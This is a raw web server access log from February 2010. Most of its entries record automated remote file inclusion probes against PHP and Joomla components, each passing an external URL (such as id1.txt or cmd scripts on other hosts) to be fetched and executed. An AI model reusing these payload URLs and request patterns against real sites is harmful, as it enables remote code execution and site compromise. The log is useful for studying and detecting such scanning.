82.76.118.170 - - [23/Feb/2010:04:10:17 -0500] "GET /logs/access_log.Q110011600//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 267 "-" "libwww-perl/5.816"
82.76.118.170 - - [23/Feb/2010:04:10:18 -0500] "GET //component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 240 "-" "libwww-perl/5.816"
82.76.118.170 - - [23/Feb/2010:04:10:18 -0500] "GET /logs//component/option/com_frontpage//index.php?option=com_frontpage&Itemid=&mosConfig.absolute.path=http://junny.net/userfiles/image/.id? HTTP/1.1" 404 245 "-" "libwww-perl/5.816"
200.93.147.154 - - [23/Feb/2010:04:10:33 -0500] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
123.143.29.250 - - [23/Feb/2010:04:12:24 -0500] "GET /logs/access_log.Q109102900//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:04:12:29 -0500] "GET /logs//index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
66.254.98.142 - - [23/Feb/2010:04:12:29 -0500] "GET //index.php?option=com_sef&Itemid=&mosConfig.absolute.path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
221.143.46.124 - - [23/Feb/2010:04:12:37 -0500] "GET //?sIncPath=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 452 "-" "-"
58.230.162.220 - - [23/Feb/2010:04:12:42 -0500] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:12:42 -0500] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:12:42 -0500] "GET /logs/access_log.Q109120500%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.219 - - [23/Feb/2010:04:12:48 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L011AFD5954E17600A7BB05E+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
58.230.162.220 - - [23/Feb/2010:04:12:59 -0500] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:12:59 -0500] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:04:12:59 -0500] "GET /logs/access_log.Q109120500%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:04:13:09 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
123.143.29.250 - - [23/Feb/2010:04:13:20 -0500] "GET /logs/access_log.Q110020500//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
66.249.71.219 - - [23/Feb/2010:04:13:50 -0500] "GET /images/DISCOVER.gif HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
221.143.46.124 - - [23/Feb/2010:04:13:56 -0500] "GET //?sIncPath=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 452 "-" "-"
123.143.29.250 - - [23/Feb/2010:04:14:00 -0500] "GET /logs/access_log.Q109081000//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://www.yuiworld.kr/bbs/data/diary/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:04:15:53 -0500] "GET /index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:04:15:53 -0500] "GET /logs/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:04:15:54 -0500] "GET /logs/access_log.Q109120500%20%20/index.php?pilih=news&%20mod=yes&aksi=recommend&id=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:16:00 -0500] "GET /r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 201 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:16:00 -0500] "GET /logs/access_log.Q109111700%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:16:05 -0500] "GET /logs//errors.php?error=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:16:05 -0500] "GET /logs/access_log.Q109051000%20%20//errors.php?error=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:16:05 -0500] "GET //errors.php?error=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:16:06 -0500] "GET /logs/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
211.95.78.56 - - [23/Feb/2010:04:16:41 -0500] "GET /logs/access_log.Q110011800%20%20/r//?_SERVER[DOCUMENT_ROOT]=http://www1.goldping.com/bbs/idxx.txt??? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:04:17:14 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
66.254.98.142 - - [23/Feb/2010:04:17:14 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 252 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)"
118.82.114.113 - - [23/Feb/2010:04:17:23 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 213 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
118.82.114.113 - - [23/Feb/2010:04:17:23 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.partyandmoreevents.de/two?? HTTP/1.1" 404 208 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
118.82.114.113 - - [23/Feb/2010:04:17:23 -0500] "GET /logs//index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
118.82.114.113 - - [23/Feb/2010:04:17:23 -0500] "GET //index.php?_REQUEST=&_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.alst.ru/cmd??&u=x HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)"
200.150.6.42 - - [23/Feb/2010:04:18:02 -0500] "GET /logs//cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:04:18:02 -0500] "GET /logs/access_log.Q109121000//cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:04:18:02 -0500] "GET //cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
67.195.115.186 - - [23/Feb/2010:04:18:47 -0500] "GET /logs/error_log.Q109061700 HTTP/1.0" 200 2209496 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
91.121.105.125 - - [23/Feb/2010:04:19:33 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:33 -0500] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:33 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:36 -0500] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:36 -0500] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 200 39481 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:36 -0500] "GET /logs/access_log.Q109071000%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
213.251.189.201 - - [23/Feb/2010:04:19:45 -0500] "GET //components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 245 "-" "Advanced Browser (http://www.avantbrowser.com)"
213.251.189.201 - - [23/Feb/2010:04:19:45 -0500] "GET /logs//components/com_remository/admin.remository.php?mosConfig.absolute.path=http://www.olir.it/areetematiche/67/ahhe.txt??? HTTP/1.1" 404 250 "-" "Advanced Browser (http://www.avantbrowser.com)"
91.121.105.125 - - [23/Feb/2010:04:19:48 -0500] "GET /logs/error_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:19:49 -0500] "GET /logs/error_log.Q109080200%20%20////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:20:29 -0500] "GET //config/dbutil.bck.php?confdir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:20:29 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:20:29 -0500] "GET /logs/error_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:04:20:38 -0500] "GET /logs/access_log.Q109110200//cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:20:43 -0500] "GET /logs/access_log.Q109102300%20%20//config/dbutil.bck.php?confdir=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:04:20:44 -0500] "GET //index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:04:20:44 -0500] "GET /logs/access_log.Q109091000%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:04:20:44 -0500] "GET /logs//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
219.150.205.156 - - [23/Feb/2010:04:21:01 -0500] "GET /logs/access_log.Q109070400//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 276 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.155 - - [23/Feb/2010:04:21:01 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 249 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
219.150.205.156 - - [23/Feb/2010:04:21:02 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.sitealacarte.be/cache/errors.txt??? HTTP/1.1" 404 254 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)"
209.59.12.99 - - [23/Feb/2010:04:21:12 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
89.36.175.10 - - [23/Feb/2010:04:21:40 -0500] "GET //config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:21:40 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:21:40 -0500] "GET /logs/error_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:04:21:54 -0500] "GET /logs/access_log.Q109102300%20%20//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:21:54 -0500] "GET //config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:21:54 -0500] "GET /logs/error_log.Q109081800%20%20//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:21:57 -0500] "GET /logs//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:22:14 -0500] "GET /logs/access_log.Q109102300%20%20//config/dbutil.bck.php?confdir=http://www.frentesdeseguridad.gov.co/images/stories/id1.txt??? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:04:22:42 -0500] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 247 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
66.254.98.142 - - [23/Feb/2010:04:22:42 -0500] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 252 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;"
74.86.155.18 - - [23/Feb/2010:04:22:44 -0500] "GET /logs/access_log.Q109061300%20%20//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:22:56 -0500] "GET //errors.php?error=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
80.67.28.152 - - [23/Feb/2010:04:22:56 -0500] "GET /logs//errors.php?error=http://eremitaw.interfree.it/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
221.143.46.124 - - [23/Feb/2010:04:24:45 -0500] "GET //?sIncPath=http://www.trilk.com/phpcookbook//images/images.jpg????&mode=id HTTP/1.1" 200 452 "-" "-"
200.201.180.130 - - [23/Feb/2010:04:24:48 -0500] "GET /////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.201.180.130 - - [23/Feb/2010:04:24:48 -0500] "GET /logs/access_log.Q110021600%20%20/////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.201.180.130 - - [23/Feb/2010:04:24:48 -0500] "GET /logs/////delete_comment.php?board_skin_path=http://www.dorfclub-hosena.de/modules/cards/images/uploaded/zfxid1.txt?? HTTP/1.1" 404 225 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:04:24:48 -0500] "GET /logs/access_log.Q109091000//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
74.86.155.18 - - [23/Feb/2010:04:24:53 -0500] "GET /logs/access_log.Q109091500//index.php?option=com_letterman&task=view&Itemid=&mosConfig_absolute_path=http://car.sorabol.ac.kr///xe/files/.files/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
98.129.77.98 - - [23/Feb/2010:04:25:24 -0500] "GET //administrator/components/com_securityimages/configinsert.php?mosConfig_absolute_path=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 259 "-" "libwww-perl/5.805"
220.181.7.84 - - [23/Feb/2010:04:26:02 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
200.150.6.42 - - [23/Feb/2010:04:26:17 -0500] "GET //cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 256 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:04:26:17 -0500] "GET /logs//cg/modules/xt_conteudo//admin/spaw/spaw_control.class.php?spaw_root=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 261 "-" "Mozilla/5.0"
123.125.66.129 - - [23/Feb/2010:04:26:24 -0500] "GET / HTTP/1.1" 200 409 "-" "Baiduspider+(+http://www.baidu.com/search/spider.htm)"
61.43.89.13 - - [23/Feb/2010:04:27:11 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
61.43.89.13 - - [23/Feb/2010:04:27:11 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
61.43.89.13 - - [23/Feb/2010:04:27:11 -0500] "GET /logs/access_log.Q110021000//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:05 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:05 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:05 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
61.43.89.13 - - [23/Feb/2010:04:28:08 -0500] "GET /logs/access_log.Q109062700//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.techedu.or.kr//bbs/data/board1/id1.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:27 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:29 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:04:28:29 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:43 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:43 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:43 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:28:51 -0500] "GET /logs/access_log.Q109071000////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:54 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:55 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.150.99.144 - - [23/Feb/2010:04:28:55 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:04:28:56 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:04:28:56 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
88.255.116.109 - - [23/Feb/2010:04:28:56 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
91.121.105.125 - - [23/Feb/2010:04:28:59 -0500] "GET /logs/error_log.Q109080200////?_SERVER[DOCUMENT_ROOT]=http://www.ckinfo.net/bbs//ikhy1.txt? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:04:29:12 -0500] "GET //include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:04:29:13 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:04:29:21 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
206.63.65.14 - - [23/Feb/2010:04:29:22 -0500] "GET /logs/access_log.Q109102900%20%20//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:04:29:28 -0500] "GET //include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 217 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:04:29:28 -0500] "GET /logs/access_log.Q109102900%20%20//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:04:29:28 -0500] "GET /logs/access_log.Q109112000%20%20//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
188.130.32.85 - - [23/Feb/2010:04:29:28 -0500] "GET /logs//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:04:30:08 -0500] "GET /logs//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:04:30:08 -0500] "GET //includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
165.132.30.11 - - [23/Feb/2010:04:30:08 -0500] "GET /logs/error_log.Q109051300%20%20//includes/phpInputFilter/class.inputfilter.php?mosConfig_absolute_path=http://blog.kakuro.com.tw/include/id1.txt? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.63.65.14 - - [23/Feb/2010:04:30:16 -0500] "GET /logs/access_log.Q109102900//include/footer.php?_path[counter]=http://www.luomoeillegno.com/extras/idxx.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
213.251.189.201 - - [23/Feb/2010:04:30:23 -0500] "GET //bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
213.251.189.201 - - [23/Feb/2010:04:30:23 -0500] "GET /logs/access_log.Q110012700//bnp///bbs//delete_all.php?board_skin_path=http://www.zooluxx.ru//id/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
